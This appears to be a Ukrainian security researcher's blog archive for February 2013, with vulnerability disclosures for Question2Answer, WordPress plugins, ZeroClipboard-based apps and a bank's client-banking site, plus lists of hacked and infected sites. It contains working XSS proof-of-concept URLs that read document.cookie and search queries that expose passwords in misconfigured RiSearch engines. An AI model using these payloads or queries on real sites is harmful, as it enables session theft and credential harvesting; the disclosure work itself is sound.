Архів за Лютий, 2013

Уразливості в Question2Answer

23:53 28.02.2013

27.11.2012

У жовтні, 21.10.2012, я виявив Brute Force, Insufficient Anti-automation та Cross-Site Request Forgery уразливості в Question2Answer. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

28.02.2013

Brute Force (WASC-11):

В логін формі (http://site/login) немає захисту від BF атак.

Експлоіт:

Question2Answer BF.html

Insufficient Anti-automation (WASC-21):

На сторінці контактів (http://site/feedback) немає захисту від автоматизованих атак.

Експлоіт:

Question2Answer IAA.html

Cross-Site Request Forgery (WASC-09):

Немає захисту від CSRF атак в функціоналі логіна (http://site/login) і логаута (http://site/logout), та на інших сторінках (взагалі в системі відсутній такий захист). В наступному адвізорі я приведу приклад CSRF, що дозволяє захопити адмінський акаунт.

Відсутність капчі в формі логіна призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін в акаунт (щоб проводити атаки на уразливості всередині акаунта), вищенаведений Brute Force та інші автоматизовані атаки.

Уразливі всі версії Question2Answer (перевірялася версія 1.5.3). Як повідомив мені розробник, в версії Q2A 1.6 він планує додати захист від CSRF (і в січні він додав цей захист в останню dev-версію Q2A).

Похакані сайти №218

22:41 28.02.2013

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://www.ubozcn.gov.ua (хакером misafir) - 11.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://www.vn.ukrstat.gov.ua (хакером Hmei7) - 13.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://bcrda.gov.ua (хакером Sejeal) - 14.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://inform.kirovograd.ua (хакером TcKS!teAzrail)
  • http://kebef.com (хакером CreativeTurk) - причому спочатку сайт 25.02.2013 був взломаний CreativeTurk, а зараз він вже взломаний BozQurd. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті

Лютневий вівторок патчів від Microsoft

20:13 28.02.2013

У лютому місяці Microsoft випустила 12 патчів. Що більше ніж у січні.

У лютневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 12 бюлетенів по безпеці. Що закривають 55 уразливостей в програмних продуктах компанії. П’ять патчів закривають критичні уразливості і сім патчів закривають важливі уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows XP, 2003, Vista, 2008, 7, 2008 R2, 8, 2012, RT. А також Microsoft Office, Internet Explorer, Exchange Server, FAST Search Server 2010 for SharePoint та .NET Framework.

Добірка експлоітів

17:22 28.02.2013

В даній добірці експлоіти в веб додатках:

  • SAP Netweaver Message Server Buffer Overflow Vulnerability (деталі)
  • BigAnt Server DUPF Command Arbitrary File Upload Vulnerability (деталі)
  • BigAnt Server 2 SCH And DUPF Buffer Overflow Vulnerability (деталі)
  • MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free (деталі)
  • BigAnt Server 2.52 Stack Overflow Vulnerability (деталі)

Уразливості в плагінах для WordPress №95

23:55 27.02.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wysija Newsletters, Google Document Embedder та Gallery. Для котрих з’явилися експлоіти. Wysija Newsletters - це плагін для відправки інформаційних листів, Google Document Embedder - це плагін для включення в сайт документів з сервісів Гугла, Gallery - це плагін для створення галерей зображень.

  • SQL Injection Vulnerability in Wysija Newsletters WordPress Plugin (деталі)
  • WordPress Google Document Embedder Arbitrary File Disclosure (деталі)
  • WordPress Gallery 3.8.3 Arbitrary File Read (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Information Leakage в локальних пошуковцях

22:46 27.02.2013

Раніше я вже писав про Гугл хакінг - використання Гугла чи інших пошукових систем для пошуку уразливостей на веб сайтах. Зокрема в статтях Використання Гугл хакінга та Просунутий Гугл хакінг я детально розглянув цю тему та навів приклади вразливих веб додатків та запити для їх пошуку в Google.

А в циклі статтей “Warning” Google хакінг та “Error” Google хакінг я розповів про методики пошуку уразливостей типу Full path disclosure та Information Leakage в пошукових системах.

Одним з просунутих методів пошуку подібних уразливостей є пошук Information Leakage в локальний пошуковцях. На відміну від Гугл хакінга, в даному випадку уразливості шукаються не в зовнішніх (глобальних) пошуковцях, а саме в локальних.

Даний метод я розробив на початку січня 2008. Information Leakage уразливість я знайшов в движку RiSearch, про XSS уразливість в якому я вже писав. До цієї IL вразливі всі версії даного движка, тому що дірка пов’язана з некоректною конфігурацією пошукової системи. Саме тому ця IL проявиться не не всіх сайтах, а лише на тих, де адміни допустилися помилок при конфігурації RiSearch. Один такий сайт мені трапився у січні 2008 (зараз на цьому домені вже інший сайт, тому про нього не згадую), але можливі й інші сайти з подібною вразливою конфігурацію.

Information Leakage:

Суть уразливості полягає в тому, що якщо адмін не заборонив індексацію папки зі скриптами, то вихідні коди скриптів індексуються й їх можна побачити через локальний пошук (Source Code Disclosure). Що може призвести до витоків логінів і паролів (та іншої важливої інформації), які вказані в коді веб додатків.

http://site/cgi-bin/search.pl?query=password

Движок RiSearch PHP, що є PHP версією RiSearch, також вразливий до даної атаки:

http://site/risearch/search.php?query=password

Даним запитом знаходяться всі скрипти сайта, які містять слово password. Що дозволяє виявити паролі (до адмінки, до БД, тощо). RiSearch виводить проіндексовані дані сніпетами, тому видно лише фрагменти коду, але цього може бути достатньо для атаки.

Аналогічним чином можна виявити всю критичну інформацію, що була проіндексована RiSearch. Подібні уразливості можуть бути як в цьому, так і інших локальних пошуковцях.

Численні уразливості в Mozilla Firefox, Thunderbird та Seamonkey

20:23 27.02.2013

Виявленні численні уразливості безпеки в Mozilla Firefox, Thunderbird та Seamonkey.

Уразливі продукти: Mozilla Firefox 18.0, Firefox ESR 17.0, Thunderbird 17.0, SeaMonkey 2.15.

Численні пошкодження пам’яті, підміна відповіді https, витік інформації, обхід захисту, DoS.

  • Mozilla Foundation Security Advisory 2013-21 (деталі)
  • Mozilla Foundation Security Advisory 2013-22 (деталі)
  • Mozilla Foundation Security Advisory 2013-23 (деталі)
  • Mozilla Foundation Security Advisory 2013-24 (деталі)
  • Mozilla Foundation Security Advisory 2013-25 (деталі)
  • Mozilla Foundation Security Advisory 2013-26 (деталі)
  • Mozilla Foundation Security Advisory 2013-27 (деталі)
  • Mozilla Foundation Security Advisory 2013-28 (деталі)

Уразливості на jsbni.kiev.ua

17:10 27.02.2013

14.07.2012

У травні, 04.05.2012, я знайшов Brute Force, Cross-Site Scripting та Cross-Site Request Forgery уразливості на http://jsbni.kiev.ua - сайті банка “Національні інвестиції” (на одному піддомені). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про peb.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.02.2013

BF + XSS + CSRF:

Всі зазначені уразливості знаходиться в клієнт-банкінгу банка “Національні інвестиції”. Всього 109 уразливостей в системи IFOBS.

https://cbserver.jsbni.kiev.ua:7002/ifobsClient/

Дані уразливості досі не виправлені.

XSS в em-shorty, RepRapCalculator, Fulcrum, Django і aCMS

23:51 26.02.2013

Після мого попереднього списку вразливих програм з ZeroClipboard.swf, у лютому, 20.02.2013, я знайшов Cross-Site Scripting уразливості в додатках, що містять ZeroClipboard10.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard. Як я зазначав, це дуже поширена флешка, що знаходиться на десятках тисяч, а потенційно і сотень тисяч веб сайтів. І вона використовується в сотнях веб додатків. Серед них em-shorty, RepRapCalculator, Fulcrum, Django і aCMS. Та існує багато інших уразливих веб додатків з ZeroClipboard10.swf (деякі з них також містять ZeroClipboard.swf).

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в першому записі).

em-shorty:

http://site/public/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

RepRapCalculator:

http://site/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Fulcrum:

http://site/admin/lib/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Django (різні веб додатки на Django фреймворку):

Django 1.3.1:

http://site/media/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/media/js/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Djangoplicity:

http://site/static/djangoplicity/js/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/static/js/ZeroClipboard10.swfZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

aCMS:

http://site/assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Окрім ZeroClipboard, в aCMS також є Cumulus (tagcloud.swf), уразливості в якому я оприлюднив (і частина з них була виправлена) ще в 2009 році.

http://site/assets/swf/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Вразливі наступні веб додатки з флешкою: em-shorty 0.5.0 та попередні версії, RepRapCalculator, Fulcrum - всі версії даної CMS, Django - є багато веб сайтів на Django framework (зокрема Django 1.3.1 та Djangoplicity) з ZeroClipboard, aCMS 1.0.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.

Інфіковані сайти №149

22:43 26.02.2013

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://vigos.com.ua - інфекція була виявлена 09.02.2013. Зараз сайт входить до переліку підозрілих.
  • http://susanin.com - інфекція була виявлена 24.02.2013. Зараз сайт не входить до переліку підозрілих.
  • http://vigos.info - інфекція була виявлена 02.02.2013. Зараз сайт входить до переліку підозрілих.
  • http://apartaments.od.ua - інфекція була виявлена 06.02.2013. Зараз сайт не входить до переліку підозрілих.
  • http://hot-girls.kiev.ua - інфекція була виявлена 12.01.2013. Зараз сайт не входить до переліку підозрілих.